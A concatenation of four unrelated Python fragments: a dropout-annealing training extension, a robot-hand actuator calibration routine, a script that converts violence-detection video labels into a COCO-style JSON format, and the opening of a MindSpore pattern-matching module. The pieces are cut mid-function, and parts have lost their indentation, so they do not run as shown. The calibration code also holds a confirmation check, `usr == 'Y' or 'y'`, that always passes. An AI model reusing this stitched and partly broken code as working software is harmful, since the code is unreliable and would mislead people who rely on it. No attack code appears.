    ----------
    decay_factor : float
        Multiplicative factor applied to every include probability per
        monitoring step (> 1 anneals dropout away).
    max_incl_prob : float
        Upper bound for the include probabilities.
    scale_learning_rate : bool
        When True, set the last layer's ``W_lr_scale`` to the square of the
        mean include probability after each update.
    keep_input_constant : bool
        When True, skip the first layer so the input dropout stays fixed.
    """

    def __init__(self, decay_factor, max_incl_prob, scale_learning_rate=False,
                 keep_input_constant=False):
        self.decay_factor = decay_factor
        self.max_incl_prob = max_incl_prob
        self.scale_learning_rate = scale_learning_rate
        self.keep_input_constant = keep_input_constant

    def _update_lr_scale(self, model, algorithm):
        # Set the last layer's learning-rate scale to the squared mean include
        # probability.  NOTE(review): the mean divides by len(model.layers)
        # even though only layers present in input_include_probs contribute to
        # the sum -- behaviour preserved from the original, confirm intent.
        mean_incl_prob = 0.0
        for layer in model.layers:
            if layer.layer_name in algorithm.cost.input_include_probs:
                mean_incl_prob += algorithm.cost.input_include_probs[layer.layer_name].get_value()
        mean_incl_prob /= len(model.layers)
        model.layers[-1].W_lr_scale = mean_incl_prob * mean_incl_prob

    @functools.wraps(TrainExtension.setup)
    def setup(self, model, dataset, algorithm):
        # Expose every managed include probability and its activation scale
        # as monitor channels so the annealing schedule can be inspected.
        monitor = model.monitor
        for layer_name in algorithm.cost.input_include_probs:
            monitor.add_channel(
                name=layer_name + "_dropout_inc_prob",
                ipt=None,
                val=algorithm.cost.input_include_probs[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
            monitor.add_channel(
                name=layer_name + "_dropout_scale",
                ipt=None,
                val=algorithm.cost.input_scales[layer_name],
                data_specs=(NullSpace(), ''),
                dataset=dataset)
        if self.scale_learning_rate:
            self._update_lr_scale(model, algorithm)

    @functools.wraps(TrainExtension.on_monitor)
    def on_monitor(self, model, dataset, algorithm):
        start_it = 1 if self.keep_input_constant else 0
        for i in range(start_it, len(model.layers)):
            layer_name = model.layers[i].layer_name
            if layer_name not in algorithm.cost.input_include_probs:
                continue
            incl_prob = algorithm.cost.input_include_probs[layer_name].get_value()
            incl_prob = min(incl_prob * self.decay_factor, self.max_incl_prob)
            algorithm.cost.input_include_probs[layer_name].set_value(
                np.cast[config.floatX](incl_prob))
            # Kept activations are rescaled by 1/p so their expected value is
            # unchanged under dropout.
            algorithm.cost.input_scales[layer_name].set_value(
                np.cast[config.floatX](1.0 / incl_prob))
        if self.scale_learning_rate:
            self._update_lr_scale(model, algorithm)
class DropoutExponentialAnnealerLayerwise(TrainExtension):
def __init__(self, decay_factor, max_incl_prob):
self.decay_factor = decay_factor
self.max_incl_prob = max_incl_prob
@functools.wraps(TrainExtension.setup)
def setup(self, model, dataset, algorithm):
monitor = model.monitor
dropout_include_prob = {}
dropout_scale = {}
for layer_name in algorithm.cost.input_include_probs:
channel_name = layer_name
monitor.add_channel(
name=channel_name + "_dropout_inc_prob",
ipt=None,
val=algorithm.cost.input_include_probs[layer_name],
| |
self.robot.iq_compensation = iq_compensation
return True
def calibration_geometry(self):
# Mark instance as un-started, uninitialized
self.robot.booted = False
self.robot.initialized = False
# Calibrate the geometry of the whole hand.
# Ping all actuators
error = self.ping() # 4 bit respectively for INDEX, INDEX_M, THUMB, Dynamixel
if error:
print("One or more actuators offline. Exiting...")
return False
if not self.bypass_DXL:
# Calibrate Palm actuator first
# Home INDEX finger
usr = input(
"Move all the finger to their home positions\nand put INDEX fingers in parallel, then press enter.")
self.DC.set_homing_offset(0)
self.robot.palm.home = self.DC.get_present_position()
print("Palm home set.")
else:
self.robot.palm.home = 0
self.MC.init_driver_all()
# Set Mode
self.MC.set_mode_all('velocity')
# Set Limits
for f in self.robot.fingerlist:
# Limits
self.MC.pbm.set_limit_iq_max((f.motor_id, 1.5))
self.MC.pbm.set_limit_velocity_max((f.motor_id, 2 * VEL_CAL))
# Home Dynamixel to the parallel position
if self.bypass_DXL:
usr = input("Move the index fingers to the parallel gesture then press enter.")
else:
# DXL not bypassed, automatic go to parallel.
usr = input("Press ENTER to change to Pinch...")
self.DC.set_mode("position") # Position mode
self.DC.torque_enable(1) # Enable
self.DC.set_goal_position(self.robot.palm.home + math.pi * 7 / 15)
time.sleep(0.5)
usr = input("If everything looks alright press enter to continue, INDEX fingers will return to Parallel.\n"
"Otherwise, press E and enter to exit.")
if usr == 'E' or usr == 'e':
return
else:
self.DC.set_goal_position(self.robot.palm.home)
time.sleep(0.5)
# Home finger
# Get home
usr = input("Auto set home? (y/n)")
if usr == "n" or usr == "N":
usr = input("Move all the finger to the home position then press enter.")
elif usr == "y" or usr == "Y":
# Look for home automatically
running = [True, True, True]
# Enable Torque
self.MC.torque_enable_all(1)
time.sleep(0.1)
# Goal Velocity
for f in self.robot.fingerlist:
if f.mirrored:
goal_velocity = -VEL_CAL
else:
goal_velocity = VEL_CAL
self.MC.pbm.set_goal_velocity((f.motor_id, goal_velocity))
home_i = [0, 0, 0]
detect_count = [0, 0, 0]
print("Looking for home...")
while sum(running):
try:
status = None
while status is None:
status = self.MC.pbm.bulk_read(self.robot.finger_ids, ['present_velocity', 'present_iq'],
error_mode=1)
# status = self.MC.pbm.get_bulk_status((INDEX.motor_id, 'present_velocity', 'present_iq'),
# (INDEX_M.motor_id, 'present_velocity', 'present_iq'),
# (THUMB.motor_id, 'present_velocity', 'present_iq'))
err = [i[1] for i in status]
vels = [i[0][0] for i in status]
iq = [i[0][1] for i in status]
for i in range(3):
if abs(vels[i]) < VEL_CAL_DETECT and abs(iq[i]) > IQ_CAL_DETECT:
if detect_count[i] > 5:
print("%s HOME reached." % self.robot.fingerlist[i].name)
# home_i[i] = iq[i]
# print("%s home_i acquired." % robot.fingerlist[i].name)
self.MC.torque_enable(self.robot.finger_ids[i], 0)
# print("End iq was %2.2f" % home_i[i])
# print("End velocity was %2.2f" % vels[i])
running[i] = False
else:
detect_count[i] += 1
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
self.MC.torque_enable_all(0)
print("User interrupted.")
# Check if HOMING_OFFSET need to be updated
finger_homing_error = []
for idx, f in enumerate(self.robot.fingerlist):
present_pos = self.MC.pbm.get_present_position(f.motor_id)[0][0][0]
if abs(present_pos) > 0.15:
# If the present position is away from zero for more than 0.05rad (~2.8deg)
finger_homing_error.append([f, present_pos])
if finger_homing_error:
# If there is any finger that needs update
print("The following finger's HOMING_OFFSET needs to be updated:")
for i in finger_homing_error:
print(i[0].name + ", homing error: " + str(i[1]))
usr = input("Press ENTER to continue, or I if you insist to ignore.")
if usr == 'I':
finger_homing_error = []
else:
# No finger needs update
print("All HOMING_OFFSET settings are fine.")
usr = input("Press ENTER to continue, or C if you insist to reset HOMING_OFFSET for all fingers.")
if usr == 'C':
# User insist to reset HOMING_OFFSET for all fingers
for f in self.robot.fingerlist:
finger_homing_error.append([f, 0])
if finger_homing_error:
# If there is any finger to be updated
# Clear HOMING_OFFSET
for i in finger_homing_error:
m_id = i[0].motor_id
self.MC.pbm.set_homing_offset((m_id, 0))
# Check setting
check = False
trial_count = 1
# debug_temp = motor_controller.pbm.get_homing_offset(m_id, m_id, m_id)
while not check:
try:
if abs(self.MC.pbm.get_homing_offset(m_id)[0][0][0]) < 1:
check = True
print("HOMING_OFFSET cleared for %s. Trails: %d." % (i[0].name, trial_count))
else:
self.MC.pbm.set_homing_offset((m_id, 0))
time.sleep(0.05)
trial_count += 1
except KeyboardInterrupt:
check = True
print("User interrupted.")
# Wait for 0.2 sec after setting HOMING_OFFSET
time.sleep(0.2)
# Get home_offset
for i in finger_homing_error:
i[0].homing_offset = -(self.MC.pbm.get_present_position(i[0].motor_id)[0][0][0])
# print(home_offset)
# Set Homing_Offset
for i in finger_homing_error:
m_id = i[0].motor_id
homing_offset = i[0].homing_offset
self.MC.pbm.set_homing_offset((m_id, homing_offset))
# time.sleep(0.05)
# Check setting
check = False
trial_count = 1
while not check:
try:
temp = self.MC.pbm.get_homing_offset(m_id)[0][0][0]
print("Current homing_offset: % 2.2f" % temp)
if abs(self.MC.pbm.get_homing_offset(m_id)[0][0][0] - homing_offset) < 0.01:
check = True
print("HOMING_OFFSET updated for %s. Trails: %d." % (i[0].name, trial_count))
else:
self.MC.pbm.set_homing_offset((m_id, homing_offset))
# time.sleep(0.05)
trial_count += 1
except KeyboardInterrupt:
check = True
print("User interrupted.")
# Wait for 0.2 sec after setting HOMING_OFFSET
time.sleep(0.2)
print("HOMING_OFFSET all updated.")
# Final check
for i in finger_homing_error:
m_id = i[0].motor_id
pos = self.MC.pbm.get_present_position(m_id)[0][0][0]
if abs(pos) < 0.01:
print("%s homed." % i[0].name)
else:
print("%s homing abnormal!" % i[0].name) # TODO: throw exception
usr = input("Continue? (Y/N)")
if usr == 'Y' or 'y':
pass
else:
return
# Update all finger.homing_offset
for f in self.robot.fingerlist:
f.homing_offset = self.MC.pbm.get_homing_offset(f.motor_id)[0][0][0]
if not self.bypass_ext_enc:
self.ext_enc.connect()
time.sleep(0.5)
data = self.ext_enc.get_angle()
self.ext_enc.release()
for idx, f in enumerate(self.robot.fingerlist):
f.encoder_offset = data[idx]
# Get end_pos
usr = input("Auto set the end limit? (y/n)")
if usr == "n" or usr == "N":
usr = input("Move all the fingers to the end limit and press enter.\n")
end_pos = self.MC.pbm.get_present_position(INDEX.motor_id, INDEX_M.motor_id, THUMB.motor_id)
for idx, i in enumerate(end_pos):
self.robot.fingerlist[idx].travel = i[0][0]
print("end_pos recorded as:", self.robot.fingerlist[idx].name, self.robot.fingerlist[idx].travel)
elif usr == "y" or usr == "Y":
# Look for End-Pos automatically
running = [True, True, True]
# Enable Torque
self.MC.torque_enable_all(1)
time.sleep(0.1)
# Goal Velocity
for f in self.robot.fingerlist:
if f.mirrored:
goal_velocity = VEL_CAL
else:
goal_velocity = -VEL_CAL
self.MC.pbm.set_goal_velocity((f.motor_id, goal_velocity))
time.sleep(0.5)
end_i = [0, 0, 0]
detect_count = [0, 0, 0]
print("Looking for end_pos...")
while sum(running):
try:
status = None
while status is None:
status = self.MC.pbm.bulk_read(self.robot.finger_ids, ['present_velocity', 'present_iq'],
error_mode=1)
# status = motor_controller.pbm.get_bulk_status((INDEX.motor_id, 'present_velocity', 'present_iq'),
# (INDEX_M.motor_id, 'present_velocity', 'present_iq'),
# (THUMB.motor_id, 'present_velocity', 'present_iq'))
err = [i[1] for i in status]
vels = [i[0][0] for i in status]
iq = [i[0][1] for i in status]
for i in range(3):
if abs(vels[i]) < VEL_CAL_DETECT and abs(iq[i]) > IQ_CAL_DETECT:
if detect_count[i] > 20:
# TODO: check total travel value
print("%s end_pos reached." % self.robot.fingerlist[i].name)
self.robot.fingerlist[i].travel = \
self.MC.pbm.get_present_position(self.robot.finger_ids[i])[0][0][0]
print("%s end_pos acquired." % self.robot.fingerlist[i].name)
end_i[i] = iq[i]
print("%s end_i acquired." % self.robot.fingerlist[i].name)
self.MC.torque_enable(self.robot.finger_ids[i], 0)
print("%s end_pos recorded as: % 8.2f" %
(self.robot.fingerlist[i].name, self.robot.fingerlist[i].travel))
print("End iq was %2.2f" % end_i[i])
print("End velocity was %2.2f" % vels[i])
running[i] = False
else:
detect_count[i] += 1
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
self.MC.torque_enable_all(0)
end_pos = [0, 0, 0]
print("User interrupted.")
usr = input("Reset fingers? (y/n)")
if usr == "y" or usr == "Y":
for f in self.robot.fingerlist:
self.MC.pbm.set_p_gain_position((f.motor_id, POS_P))
self.MC.pbm.set_i_gain_position((f.motor_id, POS_I))
self.MC.pbm.set_d_gain_position((f.motor_id, POS_D))
self.MC.pbm.set_limit_iq_max((f.motor_id, 1))
time.sleep(0.2)
print("Fingers resetting...")
# Set Mode and Limit
self.MC.set_mode_all('position')
running = [True, True, True]
# Enable torque and go to Home
self.MC.torque_enable_all(1)
self.MC.pbm.set_goal_position((THUMB.motor_id, 0.01), (INDEX.motor_id, 0.01), (INDEX_M.motor_id, 0.01))
time.sleep(1)
while sum(running):
try:
# status = self.MC.pbm.get_bulk_status(
# (INDEX.motor_id, 'present_position'),
# (INDEX_M.motor_id, 'present_position'),
# (THUMB.motor_id, 'present_position'))
status = self.MC.pbm.get_present_position(INDEX.motor_id, INDEX_M.motor_id, THUMB.motor_id)
err = [data[1] for data in status]
position = [data[0][0] for data in status]
for i in range(3):
if abs(position[i]) < 0.08:
running[i] = False
self.MC.torque_enable(self.robot.finger_ids[i], 0)
if err[i] != 128:
print("%s BEAR error, code:" % self.robot.fingerlist[i].name, bin(err[i]))
except KeyboardInterrupt:
running = [0]
print("User interrupted.")
self.MC.torque_enable_all(0)
if not self.bypass_DXL:
self.DC.torque_enable(0)
print("Calibration summary:")
for f in self.robot.fingerlist:
print("%s Motor ID: %d, homing_offset: % 8.2f, travel: % 8.2f, encoder_offset: % 8.2f"
% (f.name, f.motor_id, f.homing_offset, f.travel, f.encoder_offset))
if finger_homing_error:
print("The following fingers' homing_offset has been updated:")
print([i[0].name for i in finger_homing_error])
usr = input("It is recommended to save changed settings. Continue? (y/n)")
if usr == 'Y' or 'y':
for i in finger_homing_error:
self.MC.pbm.save_config(i[0].motor_id)
print("Config saved to BEAR.")
else:
print("Abort saving to BEAR. Please power cycle hardware before using.")
usr = input("Save Data? (y/n)")
if usr == "y" or usr == "Y":
# Build list
data = []
for f in self.robot.fingerlist:
data.append([f.name, | |
<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # Create INCAR and INVICON MOLA JSON
# version: 2
#
# info:
# - Create standard MOLA JSON
#
# author: <NAME>
"""
# ## MOLA Annotations Data Format
# If you wish to combine multiple datasets, it is often useful to convert them into a unified data format.
#
# Objective:
# In[2]:
#ANNOTATIONS FORMAT (BASED ON COCO)
#Annotations format keys:
{ "info": None,
"licenses": [], #TODO
"categories": [],
"images": [],
"annotations": [],
"videos": [],
"video_annotations": [],
"tracks": [], #TODO - only for Object Tracking
"segment_info": [], #TODO
"datasets": [{'name': 'INCAR', 'id': 1}, {'name': 'INVICON', 'id': 2}]
}
#1 object definition:
info: {
"year": int,
"version": str,
"description": str,
"contributor": str,
"url": str,
"date_created": datetime,
}
license: {
"id": int,
"name": str,
"url": str,
}
category: {
"id": int,
"name": str,
"supercategory": str,
"dataset": int, #dataset_id
}
image: {
"id" : int,
"video_id": int,
"file_name" : str,
"license" : int,
"dataset": int, #dataset_id
# Redundant fields for COCO-compatibility
"width": int,
"height": int,
"frame_index": int, #frame index from original video_id
"date_captured": datetime,
}
annotation: { #rawframes annotation
"category_id": int
"image_id": int,
#"track_id": int, # NOT FOR ACTION, ONLY FOR OBJECT TRACKING
"bbox": [x,y,width,height],
"area": float,
"label_frames": int, # TOTAL NUMBER OF FRAMES OF LABEL category_id
"dataset": int, #dataset_id
# Redundant field for compatibility with COCO scripts
"id": int,
"iscrowd": 0 or 1, (iscrowd=1) are used to label large groups of objects (e.g. a crowd of people)
"segmentation": RLE(iscrowd=1) or [polygon](iscrowd=0),
}
video: {
"id": int,
"name": str,
"width" : int,
"height" : int,
"total_frames": int, # TOTAL NUMBER OF FRAMES OF THE VIDEO
"fps": int,
"dataset": int, #dataset_id
#"metadata": dict, # Metadata about the video - NOT NECESSARY ADDITIONAL DICT
}
video_annotation: {
"id": int,
"category_id": int, #label
"video_id": int,
"time_start": int, #in frames, then it can be converted using the fps
"time_end":int, #in frames
"label_frames": int, # TOTAL NUMBER OF FRAMES OF LABEL category_id
"dataset": int, #dataset_id
}
segment: { #TODO
"id": int,
"category_id": int,
"area": int,
"bbox": [x,y,width,height],
# Redundant field for compatibility with COCO scripts
"iscrowd": 0 or 1,
}
track: { #DOES IT MAKE SENSE TO TRACK ACTIONS INSIDE THE VIDEO? NO - ONLY OBJECTS
"id": int,
"category_id": int,
"video_id": int
}
"""
# ## SETUP
import platform
import json
import os
from tqdm import tqdm
import argparse
import datetime
# ## Functions
def init_json(file='mola.json'):
    """Write an empty MOLA-format annotation skeleton to `file`.

    The skeleton carries every top-level key of the MOLA format (a COCO
    superset) plus a fixed "info" header stamped with the creation time.
    """
    skeleton = {
        "info": {
            "description": "MOLA Dataset",
            "url": "",
            "version": "1",
            "year": 2021,
            "date_created": datetime.datetime.utcnow().isoformat(' ')
        },
        "licenses": [],
        "categories": [],
        "videos": [],
        "images": [],
        "tracks": [],
        "segment_info": [],
        "annotations": [],
        "video_annotations": [],
        "datasets": []  # e.g. [{'name': 'COCO', 'id': 1}, {'name': 'TAO', 'id': 2}]
    }
    with open(file, 'w') as f:
        json.dump(skeleton, f)
    print("JSON INITIATED : {}".format(file))
def parse_path(path):
    """Return `path` with every backslash separator replaced by '/'.

    The original implementation chained a second ``replace('\\ ', '/')``;
    it could never match because the first replace already removed every
    backslash, and its literal relied on an invalid escape sequence that
    triggers a SyntaxWarning on modern Python, so it was dropped.
    """
    return path.replace('\\', '/')
def fix_pahts(gt):
    """Normalize the frame paths stored in a groundTruth export, in place.

    Steps: unwrap a dict-shaped DataSource, pick a reference path (the first
    entry containing "gt", else the first entry), convert all separators to
    '/', redirect stray MATLAB install paths next to the reference path, and
    finally keep only the last seven path components of every entry.
    Returns the mutated `gt` dict.
    """
    sources = gt['gTruth']['DataSource']
    if isinstance(sources, dict) and 'Source' in sources:
        sources = sources['Source']
    # Reference path: first entry mentioning "gt", falling back to entry 0.
    reference = next((p for p in sources if "gt" in p), sources[0])
    reference = parse_path(reference)
    normalized = [parse_path(p) for p in sources]
    repaired = []
    for p in normalized:
        if "MATLAB" in p:
            # MATLAB BUG: labels sometimes point into the MATLAB install dir
            # (e.g. 'C:\Tools\MATLAB\R2020a\examples\symbolic\data\196.png');
            # keep the file name but re-root it beside the reference path.
            p = '/'.join(reference.split('/')[:-1] + [p.split('/')[-1]])
        repaired.append(p)
    # Strip the machine-specific root, keeping the last seven components.
    gt['gTruth']['DataSource'] = ['/'.join(p.split('/')[-7:]) for p in repaired]
    return gt
def import_categories(molajson, gt, start_id=0):
    """Append the label definitions of a groundTruth export to `molajson`.

    Each label in gt['gTruth']['LabelDefinitions'] becomes one category with
    an id offset by `start_id`, followed by a manually added "NONVIOLENT"
    category.  Returns the updated json plus the parallel name / id / dataset
    lists used by the annotation builders.
    """
    dataset = molajson["datasets"][0]['id']
    cat_l = []
    cat_l_id = []
    cat_l_dset = []
    for i, c in enumerate(tqdm(gt['gTruth']['LabelDefinitions'])):
        cat_l.append(c['Name'])
        cat_l_id.append(start_id + i + 1)  # ids start from 1
        cat_l_dset.append(dataset)
        molajson['categories'].append({'name': cat_l[i], 'id': cat_l_id[i], 'dataset': cat_l_dset[i]})
    # ADDITIONAL CATEGORIES: MANUAL
    name = 'NONVIOLENT'
    # BUGFIX: the manual category id previously ignored `start_id`
    # (cid = len(cat_l) + 1), which produced duplicate ids whenever
    # categories from a prior dataset were already imported.
    cid = start_id + len(cat_l) + 1
    molajson['categories'].append({'name': name, 'id': cid, 'dataset': dataset})
    cat_l.append(name)
    cat_l_id.append(cid)
    cat_l_dset.append(dataset)
    print("\n>> categories:\n", molajson['categories'][-2:])
    return molajson, cat_l, cat_l_id, cat_l_dset
def import_videos(molajson, gt, res, start_id=0, sensor="rgb", ext=".mp4"):
    """Register the (single) video behind a groundTruth export in `molajson`.

    The video name and path derive from the first frame path: the last three
    path components (sensor/img/frame) are dropped and replaced by a 'gt'
    folder holding a synthetic '<scenario>_<sensor><ext>' file name (spaces
    in the file name are replaced by underscores).
    Returns the updated json plus single-element path / id lists.
    """
    dataset_id = molajson["datasets"][0]['id']
    frames = gt['gTruth']['DataSource']
    scenario_parts = frames[0].split('/')[:-3]
    # e.g. "Session 1" -> "Session_1" in the synthetic file name only.
    file_name = ('_'.join(scenario_parts) + '_' + sensor + ext).replace(' ', '_')
    video_path = '/'.join(scenario_parts) + '/' + 'gt' + '/' + file_name
    video_id = start_id + 1
    video_l = [video_path]
    video_l_id = [video_id]
    molajson['videos'].append({'name': video_path,
                               'id': video_id,
                               'width': res[sensor][0],
                               'height': res[sensor][1],
                               'sensor': sensor,
                               'fps': res['fps'],
                               'total_frames': len(frames),
                               'dataset': dataset_id})
    print("\n>> video:\n", molajson['videos'])
    return molajson, video_l, video_l_id
def import_images(molajson, gt, res, start_id=0, video_id=1, sensor="rgb"):
    """Append one image record per frame of a groundTruth export.

    Ids continue from `start_id`.  The scenario name (4th path component from
    the end) is stored as caption, the capture day (6th from the end) as
    date_captured, and the numeric file stem as frame_index.
    Returns the updated json plus parallel path / id lists.
    """
    dataset_id = molajson["datasets"][0]['id']
    img_l = []
    img_l_id = []
    for offset, frame_path in enumerate(tqdm(gt['gTruth']['DataSource'])):
        image_id = start_id + offset + 1  # ids start from 1
        img_l.append(frame_path)
        img_l_id.append(image_id)
        stem = frame_path.split('/')[-1].split('.')[0]
        molajson['images'].append({'file_name': frame_path,
                                   'id': image_id,
                                   'video_id': video_id,
                                   'caption': frame_path.split('/')[-4],  # scenario
                                   'width': res[sensor][0],
                                   'height': res[sensor][1],
                                   "frame_index": int(stem),
                                   "date_captured": frame_path.split('/')[-6],
                                   'dataset': dataset_id})
    print("\n>> images:\n", molajson['images'][-2:])
    return molajson, img_l, img_l_id
def create_annotations(molajson, gt, res, cat_l, cat_l_id, cat_l_dset, img_l_id, start_id=0, sensor="rgb"):
    """Create one full-frame annotation per frame, labelled VIOLENT/NONVIOLENT.

    Every frame receives a bbox covering the whole sensor resolution; the
    category comes from the per-frame boolean gt label and `label_frames`
    counts how many frames of the video carry that same category.
    Returns the updated json plus the parallel annotation field lists.
    """
    dataset_id = molajson["datasets"][0]['id']
    labels = gt['gTruth']['LabelData']
    # Pre-compute the 1-based frame indices of each class once.
    frames_violent = [idx + 1 for idx, lab in enumerate(labels) if lab["VIOLENT"]]
    frames_nonviolent = [idx + 1 for idx, lab in enumerate(labels) if not lab["VIOLENT"]]
    full_area = res[sensor][0] * res[sensor][1]
    ann_id = []
    ann_catid = []
    ann_imgid = []
    ann_bbox = []
    ann_dset = []
    for idx, lab in enumerate(tqdm(labels)):
        if lab["VIOLENT"]:
            category_id = cat_l_id[cat_l.index("VIOLENT")]
            class_frames = frames_violent
        else:
            category_id = cat_l_id[cat_l.index("NONVIOLENT")]
            class_frames = frames_nonviolent
        annotation_id = start_id + idx + 1
        image_id = img_l_id[idx]
        frame_bbox = [0, 0, res[sensor][0], res[sensor][1]]  # [x, y, width, height]
        ann_id.append(annotation_id)
        ann_catid.append(category_id)
        ann_imgid.append(image_id)
        ann_bbox.append(frame_bbox)
        ann_dset.append(dataset_id)
        molajson['annotations'].append({'id': annotation_id,
                                        'category_id': category_id,
                                        'image_id': image_id,
                                        'bbox': frame_bbox,
                                        'area': full_area,
                                        "label_frames": len(class_frames),
                                        'iscrowd': 0,
                                        'dataset': dataset_id})
    print("\n>> annotations:\n", molajson['annotations'][-2:])
    return molajson, ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset
def create_video_annotations(molajson, gt, res, cat_l, cat_l_id, cat_l_dset, video_l_id, start_id=0, sensor="rgb"):
    """Create one video-level annotation per category present in the video.

    A category's time span runs from its first to its last labelled frame
    (1-based, in frames, convertible via fps).  Categories with no labelled
    frame are skipped, which intentionally leaves gaps in the id sequence
    since ids derive from the category index.
    Returns the updated json plus the parallel annotation field lists.
    """
    dataset_id = molajson["datasets"][0]['id']
    labels = gt['gTruth']['LabelData']
    frames_violent = [idx + 1 for idx, lab in enumerate(labels) if lab["VIOLENT"]]
    frames_nonviolent = [idx + 1 for idx, lab in enumerate(labels) if not lab["VIOLENT"]]
    ann_id = []
    ann_catid = []
    ann_videoid = []
    ann_dset = []
    for idx, cat_name in enumerate(tqdm(cat_l)):
        # NOTE: every category other than NONVIOLENT maps onto the VIOLENT
        # frame list (dataset-specific behaviour preserved from the original).
        class_frames = frames_nonviolent if cat_name == "NONVIOLENT" else frames_violent
        if not class_frames:
            continue  # no frames of this category, hence no video annotation
        annotation_id = start_id + idx + 1
        video_id = video_l_id[0]  # only one video per scenario
        ann_id.append(annotation_id)
        ann_catid.append(cat_l_id[idx])
        ann_videoid.append(video_id)
        ann_dset.append(dataset_id)
        molajson['video_annotations'].append({'id': annotation_id,
                                              'category_id': cat_l_id[idx],
                                              'video_id': video_id,
                                              'time_start': int(class_frames[0]),
                                              'time_end': int(class_frames[-1]),
                                              "label_frames": len(class_frames),
                                              'dataset': dataset_id})
    print("\n>> video_annotations:\n", molajson['video_annotations'][-2:])
    return molajson, ann_id, ann_catid, ann_videoid, ann_dset
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--root', type=str, default='D:/external_datasets/MOLA/', help='root dir of datasets')
parser.add_argument('--datasets', nargs='+', default=['INCAR'], help='list of datasets')
args = parser.parse_args()
root=args.root
datasets=args.datasets
#Define root dir dependent on OS
rdir=root #WARNING needs to be root datasets
print('OS: {}'.format(platform.platform()))
print('root dir: {}'.format(rdir))
# define resolutions
res = {
'rgb': [2048, 1536], # w,h
'thermal': [640, 512],
'pointcloud': [640, 576],
'fps': 30
}
# FOR LOOP"
datasetsdir = os.listdir(rdir)
missing_gt_json = []
missing_gt_mat = []
label_folder = "gt"
label_fname = "gt2.json"
label_mat_fname = "gt.m"
sensor = "rgb"
ext = ".mp4"
did = 1 # start dataset id
for dataset in datasetsdir:
if dataset in datasets:
daysdir = os.path.join(rdir, dataset)
if not os.path.isdir(daysdir): continue # test if is a folder
days = os.listdir(daysdir)
print(">>>\n EXTRACTING DATASET: " + dataset)
# INIT JSON
molafile = rdir + dataset + '/' + 'mola.json'
init_json(file=molafile)
molajson = json.load(open(molafile))
molajson['datasets'] = [
{'name': dataset, 'id': did}] # [{'name': d, 'id': i+1} for i,d in enumerate(datasets)]
did += 1 # nem dataset added
with open(molafile, 'w') as f:
json.dump(molajson, f)
# INIT VARS
imported_cats = False # import cats from each dataset
cat_start_id = 0
video_start_id = 0
img_start_id = 0
ann_start_id = 0
vid_ann_start_id = 0
cat_l, cat_l_id, cat_l_dset = [], [], []
video_l, video_l_id = [], []
img_l, img_l_id = [], []
ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset = [], [], [], [], []
vid_ann_id, vid_ann_catid, ann_videoid, vid_ann_dset = [], [], [], []
# FOR LOOP
for day in days:
sessiondir = os.path.join(daysdir, day)
if not os.path.isdir(sessiondir): continue # test if is a folder
sessions = os.listdir(sessiondir)
for session in sessions:
scenariosdir = os.path.join(sessiondir, session)
if not os.path.isdir(scenariosdir): continue # test if is a folder
scenarios = os.listdir(scenariosdir)
for scenario in scenarios:
imgdir = os.path.join(scenariosdir, scenario)
if not os.path.isdir(imgdir): continue # test if is a folder
labeldir = os.path.join(imgdir, label_folder)
# if not os.path.isdir(labeldir): continue #should exist
filename = os.path.join(labeldir, label_fname)
try:
gt = json.load(open(filename))
# fix gt paths
gt = fix_pahts(gt) # gTruth can be also missing missing
except:
print(">>>>>>>MISSING OR BUG gtFILE: ", filename)
missing_gt_json.append(filename)
if not os.path.isfile(
filename.replace(label_fname, label_mat_fname)): missing_gt_mat.append(
filename.replace(label_fname, label_mat_fname))
continue
# update molajson
if not imported_cats: # only imports one time
molajson, cat_l, cat_l_id, cat_l_dset = import_categories(molajson, gt,
start_id=cat_start_id)
imported_cats = True
molajson, video_l, video_l_id = import_videos(molajson, gt, res,
start_id=video_start_id,
sensor=sensor,
ext=ext)
molajson, img_l, img_l_id = import_images(molajson, gt, res,
start_id=img_start_id,
video_id=video_l_id[-1])
molajson, ann_id, ann_catid, ann_imgid, ann_bbox, ann_dset = create_annotations(molajson, gt,
res,
cat_l, cat_l_id,
cat_l_dset,
img_l_id,
start_id=ann_start_id,
sensor=sensor)
molajson, vid_ann_id, vid_ann_catid, ann_videoid, vid_ann_dset = create_video_annotations(
molajson, gt, res,
cat_l, cat_l_id,
cat_l_dset, video_l_id,
start_id=vid_ann_start_id,
sensor=sensor)
# update start ids to the last id
cat_start_id = cat_l_id[-1]
video_start_id = video_l_id[-1]
img_start_id = img_l_id[-1]
ann_start_id = ann_id[-1]
vid_ann_start_id = vid_ann_id[-1]
# | |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""PatternEngine for modifying SymbolTree by pattern."""
import abc
from collections import OrderedDict
from typing import List, Optional, Tuple, Type, Union

from mindspore.nn import Cell
from mindspore import log as logger

from .node_type import NodeType
from .node import Node
from .symbol_tree import SymbolTree
from .tree_node_helper import TreeNodeHelper
class PatternNode:
"""
`PatternNode` is defined as a node while defining pattern.
Args:
pattern_node_name (str): Name of current node.
match_type (Type): A type represents what type would be matched of current node.
inputs (list[PatternNode]): Input nodes of current node.
"""
def __init__(self, pattern_node_name: str, match_type: Type = Type[None], inputs: ['PatternNode'] = None):
self._name = pattern_node_name
self._type = match_type
if inputs is None:
self._inputs = []
else:
self._inputs = inputs
@staticmethod
def from_node(node: Node) -> 'PatternNode':
"""
Create a `PatternNode` from `node`.
Args:
node (Node): Input rewrite node.
Returns:
A `PatternNode` created from `node`.
"""
pattern_node: PatternNode = PatternNode(node.get_targets()[0])
if node.get_node_type() is NodeType.CallCell:
pattern_node._type = node.get_instance_type()
return pattern_node
@staticmethod
def create_pattern_from_node(node: Node) -> 'PatternNode':
"""
Create a Pattern from `node` with its inputs.
Args:
node (Node): Input rewrite node.
Returns:
